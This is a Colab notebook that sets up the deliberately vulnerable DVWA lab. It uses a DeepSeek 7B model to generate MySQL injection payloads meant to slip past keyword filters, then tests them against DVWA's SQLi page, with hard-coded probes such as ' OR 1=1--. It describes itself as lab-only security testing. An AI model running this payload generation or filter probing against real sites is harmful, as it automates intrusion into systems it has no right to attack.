# WAF Bypass - Colab Quick Runner (DeepSeek 7B Base, no adapter)

This notebook helps you:
- Spin up DVWA quickly on Colab (temporary, for a few minutes).
- Load `deepseek-ai/deepseek-llm-7b-base` in 4-bit for inference.
- Generate SQLi payloads and test them against DVWA endpoints.
- Optionally upload a JSONL dataset to batch-test.

Notes:
- Runtime is ephemeral. Restarting loses DVWA and model weights from RAM.
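- For public access, this uses ngrok (optional). A tunnel makes the deliberately vulnerable DVWA instance reachable from the internet, so keep it short-lived. For requests from inside the Colab VM, use 127.0.0.1.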
- This is for lab use only. Do not target systems you do not own or control.


In [None]:
# Check GPU and install dependencies
# Show the attached GPU; if nvidia-smi is missing or fails, print a fallback message instead.
!nvidia-smi || echo 'No GPU detected'
!pip -q install --upgrade pip
# The model stack (transformers/accelerate/bitsandbytes/peft/trl) is pinned to exact
# versions; `datasets` on the same line is left unpinned.
!pip -q install transformers==4.42.3 accelerate==0.30.1 bitsandbytes==0.43.1 peft==0.11.1 trl==0.9.6 datasets
# Extra packages, all unpinned.
!pip -q install httpx pyyaml sentencepiece
# Sanity check: report the device torch sees and the transformers version that imports.
# NOTE(review): `os` is imported here but not used in this cell.
import os, torch, transformers
print(torch.cuda.get_device_name(0) if torch.cuda.is_available() else 'CPU')
print(transformers.__version__)


In [None]:
# Provide your Hugging Face token without storing it in the notebook.
#
# A token must never be written into a cell: notebooks get shared and committed, and
# any token that has appeared in one should be treated as leaked and revoked.
# If HF_TOKEN is already present in the environment it is reused; otherwise you are
# prompted and the input is not echoed. Leaving the prompt blank keeps HF_TOKEN unset.

import os
from getpass import getpass

if not os.environ.get('HF_TOKEN'):
    entered_token = getpass('Hugging Face token (leave blank to skip): ').strip()
    if entered_token:
        os.environ['HF_TOKEN'] = entered_token
print('HF token set:', 'OK' if os.environ.get('HF_TOKEN') else 'MISSING')

In [None]:
# Load the DeepSeek 7B base checkpoint quantized to 4-bit (no adapter attached)
from transformers import AutoTokenizer, AutoModelForCausalLM, BitsAndBytesConfig
import torch, os

model_name = 'deepseek-ai/deepseek-llm-7b-base'
# None when HF_TOKEN is not set in the environment
hf_token = os.environ.get('HF_TOKEN', None)

# 4-bit NF4 weights with double quantization; computation runs in float16
bnb = BitsAndBytesConfig(
    bnb_4bit_compute_dtype=torch.float16,
    bnb_4bit_use_double_quant=True,
    bnb_4bit_quant_type='nf4',
    load_in_4bit=True,
)

tok = AutoTokenizer.from_pretrained(model_name, token=hf_token)
# Fall back to EOS as the padding token when the tokenizer defines none
if tok.pad_token is None:
    tok.pad_token = tok.eos_token
tok.padding_side = 'left'

model = AutoModelForCausalLM.from_pretrained(
    model_name,
    token=hf_token,
    torch_dtype=torch.float16,
    quantization_config=bnb,
    device_map='auto',
)
model.eval()
print('Model loaded')


## DVWA on Colab - Quick & Dirty Setup


In [None]:
# 1) Install Apache + PHP + MariaDB
!apt-get -qq update
!apt-get -qq install -y apache2 php php-mysqli php-gd mariadb-server git > /dev/null
# 2) Start MariaDB
!service mysql start
# 3) Fetch DVWA
!rm -rf /var/www/html/*
!git clone -q https://github.com/digininja/DVWA.git /var/www/html/
# 4) Perms + DB
!chmod -R 777 /var/www/html/hackable /var/www/html/config
!mysql -e "CREATE DATABASE dvwa;"
!mysql -e "CREATE USER 'dvwa'@'localhost' IDENTIFIED BY 'p@ssw0rd';"
!mysql -e "GRANT ALL PRIVILEGES ON dvwa.* TO 'dvwa'@'localhost';"
!mysql -e "FLUSH PRIVILEGES;"
# 5) Config file
!cp /var/www/html/config/config.inc.php.dist /var/www/html/config/config.inc.php
!sed -i "s/'db_user' ] = ''/'db_user' ] = 'dvwa'/g" /var/www/html/config/config.inc.php
!sed -i "s/'db_password' ] = ''/'db_password' ] = 'p@ssw0rd'/g" /var/www/html/config/config.inc.php
# 6) Start Apache
!service apache2 start
print('DVWA base services are up. Open /setup.php to initialize tables.')


In [None]:
# 7) Optional: expose port 80 through an ngrok tunnel
try:
    from pyngrok import ngrok
except Exception:
    # pyngrok could not be imported: install it with the kernel's interpreter, then retry
    import subprocess
    import sys
    pip_install_cmd = [sys.executable, '-m', 'pip', 'install', '-q', 'pyngrok']
    subprocess.check_call(pip_install_cmd)
    from pyngrok import ngrok

# Keep the value returned by ngrok.connect and show it as the cell output
public_url = ngrok.connect(80)
public_url


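Open the ngrok URL, go to `/setup.php`, click **Create / Reset Database**, then log in with username `admin` and password `password`.
If you prefer headless testing (no browser), the code below logs in and sends requests directly; the DVWA tables must still have been initialized via `/setup.php` first.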


In [None]:
# DVWA helpers (headless)
import requests, re
# Base URL of the DVWA instance; the login and SQLi endpoint URLs below derive from it.
# NOTE(review): when going through the ngrok tunnel, `public_url` holds the object
# returned by ngrok.connect(80); presumably its `.public_url` attribute is the URL
# string, whereas str(public_url) is the object's repr — confirm against pyngrok.
DVWA_BASE = 'http://127.0.0.1'  # or the tunnel's public URL if using ngrok
DVWA_LOGIN = f'{DVWA_BASE}/login.php'
DVWA_SQLI = f'{DVWA_BASE}/vulnerabilities/sqli/'

def dvwa_login(session: requests.Session, username='admin', password='password') -> bool:
    """Log `session` into DVWA and report whether the login succeeded.

    Fetches the login page, extracts the 32-hex-digit `user_token` hidden field,
    and posts it together with the credentials. Cookies set along the way stay
    on `session`, so later requests made with it are authenticated.

    Args:
        session: Session used for both requests.
        username: DVWA account name.
        password: DVWA account password.

    Returns:
        True when, after following redirects, the final URL is neither the login
        page nor the setup page. False otherwise, including when no `user_token`
        could be found in the login page.
    """
    r = session.get(DVWA_LOGIN, allow_redirects=True, timeout=15)
    # Accept either quote style around the attribute values.
    m = re.search(r"user_token['\"]\s+value=['\"]([a-f0-9]{32})['\"]", r.text, re.I)
    if not m:
        return False
    data = {
        'username': username,
        'password': password,
        'user_token': m.group(1),
        'Login': 'Login',
    }
    r = session.post(DVWA_LOGIN, data=data, allow_redirects=True, timeout=15)
    final_url = str(r.url)
    # Ending up on setup.php is not a successful login either.
    # NOTE(review): presumably DVWA redirects there while its tables are not yet
    # initialized — confirm against the DVWA version in use.
    return 'login.php' not in final_url and 'setup.php' not in final_url

def test_payload(session: requests.Session, payload: str) -> str:
    """Send `payload` as the `id` parameter to the DVWA SQLi page and classify the response.

    Args:
        session: Session used for the request (expected to be logged in already).
        payload: Value sent as the `id` query parameter.

    Returns:
        'blocked' when the response status is 403,
        'sql_error_bypass' when the lower-cased body contains a known SQL error
        signature, and 'passed' otherwise.
    """
    # NOTE(review): only `id` is sent; DVWA's SQLi page may require a `Submit`
    # parameter before it runs the query — confirm against the DVWA source.
    r = session.get(DVWA_SQLI, params={'id': payload}, allow_redirects=True, timeout=15)
    if r.status_code == 403:
        return 'blocked'
    txt = r.text.lower()
    # All signatures are lower-case because the body is lower-cased above.
    # 'sqlstate[' matches PDO-style "SQLSTATE[...]" messages (was mistyped as 'sqlstate{').
    sql_err = (
        'you have an error in your sql syntax',
        'warning: mysql_',
        'sqlstate[',
        'incorrect syntax near',
        'fatal error: uncaught pdoexception',
        'sqlite error',
        'syntax error at or near',
    )
    if any(signature in txt for signature in sql_err):
        return 'sql_error_bypass'
    return 'passed'

def probe_blocked(session: requests.Session) -> list:
    """Return the labels of the fixed probe strings that the endpoint answers with HTTP 403.

    Each probe is sent as the `id` query parameter of the DVWA SQLi page; labels
    are returned in probe order ('OR', 'UNION', 'AND').
    """
    probes = (
        ('OR', "' OR 1=1--"),
        ('UNION', "' UNION SELECT 1,2--"),
        ('AND', "' AND 1=1--"),
    )

    def _is_rejected(probe: str) -> bool:
        # A 403 status is the only signal treated as "blocked".
        resp = session.get(DVWA_SQLI, params={'id': probe}, allow_redirects=True, timeout=10)
        return resp.status_code == 403

    return [label for label, probe in probes if _is_rejected(probe)]

print('DVWA helpers ready')


In [None]:
# Simple prompt + generation
import torch, re

def build_prompt(blocked_keywords, one=False):
    """Build the generation prompt as a 3-tuple of string segments.

    The segments are (system line, task + avoid-keywords lines, output-format
    lines); callers concatenate them to obtain the full prompt.

    Args:
        blocked_keywords: Interpolated verbatim into the "Avoid keywords" line.
        one: When truthy, ask for exactly one payload; otherwise ask for 8.

    Returns:
        Tuple of three strings, each ending with a newline.
    """
    system_part = "You are a helpful AI assistant.\n"
    avoid_line = f"Avoid keywords: {blocked_keywords}.\n"
    reasoning_line = "Reasoning: <1-2 sentences>\n"

    if one:
        task_line = "Generate exactly one MySQL SQL injection test payload.\n"
        format_part = "Output format:\n" + "Payload: <payload>\n" + reasoning_line
    else:
        task_line = "Generate 8 distinct MySQL SQL injection test payloads.\n"
        format_part = "Output each as: Payload: <payload>\n" + reasoning_line

    return (system_part, task_line + avoid_line, format_part)

def extract_payloads(text: str) -> list:
    """Extract the values following each `Payload:` marker in `text`.

    Each value is stripped of surrounding whitespace. Empty values and the
    literal template placeholder `<payload>` are dropped, since neither is a
    real payload.

    Args:
        text: Text to scan.

    Returns:
        Extracted payload strings in order of appearance (duplicates kept).
    """
    # Regex: Payload: <payload>
    candidates = (m.strip() for m in re.findall(r"Payload:\s*(.*)", text))
    return [c for c in candidates if c and c != "<payload>"]

def generate_payloads(blocked_keywords, num_return_sequences=1, max_new_tokens=256):
    """Sample completions from the loaded model and return the unique payloads found in them.

    The prompt asks for a single payload when `num_return_sequences` is 1 and
    for several otherwise. Only the newly generated tokens are decoded, so the
    `Payload: <payload>` template line inside the prompt is never parsed as a
    payload.

    Args:
        blocked_keywords: Passed through to `build_prompt`.
        num_return_sequences: Number of sampled completions.
        max_new_tokens: Generation length limit per completion.

    Returns:
        Sorted list of distinct payload strings (possibly empty).
    """
    prompt = "".join(build_prompt(blocked_keywords, one=(num_return_sequences == 1)))
    inputs = tok(prompt, return_tensors="pt").to(model.device)
    prompt_len = inputs["input_ids"].shape[1]
    with torch.no_grad():
        out = model.generate(
            **inputs,
            max_new_tokens=max_new_tokens,
            do_sample=True,
            temperature=0.8,
            top_p=0.9,
            pad_token_id=tok.eos_token_id,
            num_return_sequences=num_return_sequences,
        )
    # The returned sequences start with the prompt tokens; keep only the continuation.
    completions = out[:, prompt_len:]
    texts = tok.batch_decode(completions, skip_special_tokens=True)
    payloads = set()
    for t in texts:
        payloads.update(extract_payloads(t))
    return sorted(payloads)

print("Generation utils ready")


In [None]:
# Smoke test: log in, probe the filter, sample 5 generations, test every extracted payload
import requests

s = requests.Session()
ok = dvwa_login(s)
print('Login OK:', ok)

blocked = probe_blocked(s)
print('Blocked keywords:', blocked)

payloads = generate_payloads(blocked, num_return_sequences=5, max_new_tokens=200)
print('Generated:', len(payloads))

# Pair each payload with its classification
results = [(payload, test_payload(s, payload)) for payload in payloads]

# Cell output: the first five results plus a count per outcome label
outcomes = [outcome for _, outcome in results]
summary = {label: outcomes.count(label) for label in ('blocked', 'passed', 'sql_error_bypass')}
results[:5], summary


## Optional: Upload JSONL and batch-test


In [None]:
from google.colab import files

# Upload your JSONL file (one object per line)
up = files.upload()
# Use the first key of the upload result as the path; empty string when nothing was uploaded
jsonl_path = next(iter(up.keys())) if up else ''
print('Uploaded:', jsonl_path)


In [None]:
# Batch-test: For each line in JSONL, generate 1 payload and test
import json
def iter_jsonl(path):
    """Yield one parsed JSON value per non-blank line of the file at `path`.

    Lines are stripped before parsing and blank lines are skipped. Undecodable
    bytes are ignored rather than raising.

    Args:
        path: Path of the JSONL file.

    Yields:
        The value produced by `json.loads` for each non-blank line.

    Raises:
        json.JSONDecodeError: If a non-blank line is not valid JSON.
    """
    # utf-8-sig strips a leading byte-order mark when present and otherwise decodes
    # like utf-8; with plain utf-8 the BOM stays on the first line and json.loads
    # rejects it.
    with open(path, 'r', encoding='utf-8-sig', errors='ignore') as f:
        for line in f:
            line = line.strip()
            if line:
                yield json.loads(line)

# Fresh session; stop immediately if DVWA login does not succeed
s = requests.Session()
ok = dvwa_login(s)
assert ok, 'Login failed; open /setup.php and initialize tables first'

blocked = probe_blocked(s)
print('Blocked keywords:', blocked)

# Counters per outcome label plus a running total; keep up to five example results
stats = dict.fromkeys(('blocked', 'passed', 'sql_error_bypass', 'total'), 0)
samples = []
for i, row in enumerate(iter_jsonl(jsonl_path)):
    # NOTE(review): `row` is not used below — every iteration sends the same prompt,
    # so the file only determines how many iterations run. Confirm this is intended.
    if i >= 50:
        break  # limit for quick run
    payloads = generate_payloads(blocked, num_return_sequences=1, max_new_tokens=160)
    if payloads:
        p = payloads[0]
        res = test_payload(s, p)
        stats[res] += 1
        stats['total'] += 1
        if len(samples) < 5:
            samples.append((p, res))

stats, samples
